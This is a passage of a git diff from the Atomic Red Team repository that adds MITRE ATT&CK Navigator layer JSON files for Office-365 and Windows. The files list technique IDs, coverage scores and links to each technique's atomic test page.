Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index e69de29b..4fe1a7d0 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json @@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index e69de29b..a66e45f7 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View 